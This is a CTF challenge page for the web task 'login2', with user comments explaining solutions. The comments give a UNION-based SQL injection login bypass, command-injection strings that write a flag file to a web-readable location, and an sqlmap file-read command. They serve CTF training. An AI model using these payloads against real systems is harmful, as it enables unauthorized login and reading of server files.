login2WEB 未解决

分数: 40 金币: 6
题目作者: 未知
一  血: ShawRoot
一血奖励: 5金币
解  决: 1649
提  示: 命令执行
描  述:
login2
评论
sunset2004 16天前

username=admin' union select 1,md5(123)#&password=123,union生成临时表将md5后的123到表里,然后密码输入123即可绕过。RCE直接通过重定向符号即可,将无回显的结果保存到a.txt里即可,123 | cat ../../../../flag > a.txt

回复 0

Zhou_re-pwn 20天前

没太看懂这题出的啥意思,进入监控系统后,和wp的绕过一模一样,结果回显没有显示

回复 0

0x2d3CN 1月前

直接sqlmap梭哈 文件读取

回复 0

Yoruko39 1月前

sql注入+RCE,但主要是代码审计,进入命令界面后,发现可以用;截断执行命令,但无回显。 可以用重定向符,将执行结果输出到文件中,再访问/a.txt即可,例如可以;cat * > a.txt,此时可以看到当前目录下所有文件,审计发现flag在一个宏变量$FLAG里,echo到文件即可

回复 0

toonavy 2月前

进程监控系统 输入需要检测的服务 ,退币!!!

回复 0

Zhumeng 2月前

这里运用登录框返回包会看到tip 然后将tip base64解码得到 部分源码,这里字段为2 通过联合查询会产生一个临时表,md5(123) password=123成功绕过 然后回来到命令执行无回血 通过1; echo `cat /flag`>>1.txt 访问1.txt得到flag

回复 0

Zhumeng 2月前

这里运用登录框返回包会看到tip 然后将tip base64解码得到 部分源码,这里字段为2 通过联合查询会产生一个临时表,md5(123) password=123成功绕过 然后回来到命令执行无回血 通过1; echo `cat /flag`>>1.txt 访问1.txt得到flag

回复 1

Kyrie-Lrving 3月前

好啊好啊,坑我3次了,每次一测试环境就崩,啥东西呀

回复 1

cccczz 3月前

sqlmap -r xxx.txt --batch --file-read=/flag

回复 2

我是CTF大王 3月前

username=admin' union select 1,md5(123)#&password=123 进入命令界面,ls没有内容,所以有可能在上层目录。123| cat ../../../../flag > test 把flag写进test文件,再http://114.67.175.224:14269/test 读出来就行了。

回复 0

WriteUp

image
harry

6 金币

评分(5)

解题动态

shuxu115 攻破了该题 5小时前
nohair7596 攻破了该题 1天前
蓝曦 攻破了该题 1天前
霡霂大魔王 攻破了该题 3天前
AIRForce 攻破了该题 3天前
decade1qiu 攻破了该题 4天前
qiyurenji 攻破了该题 4天前
ssqs 攻破了该题 4天前
Deyudeyu 攻破了该题 5天前
mps11 攻破了该题 5天前
nina123 攻破了该题 6天前
BotTle527 攻破了该题 6天前
wangif424 攻破了该题 6天前
yeran 攻破了该题 9天前
qingfeng1115 攻破了该题 10天前
阳光茉莉 攻破了该题 12天前
Aikhfg 攻破了该题 13天前
opppo 攻破了该题 13天前
yhyyhy 攻破了该题 15天前
sunset2004 攻破了该题 16天前
问题反馈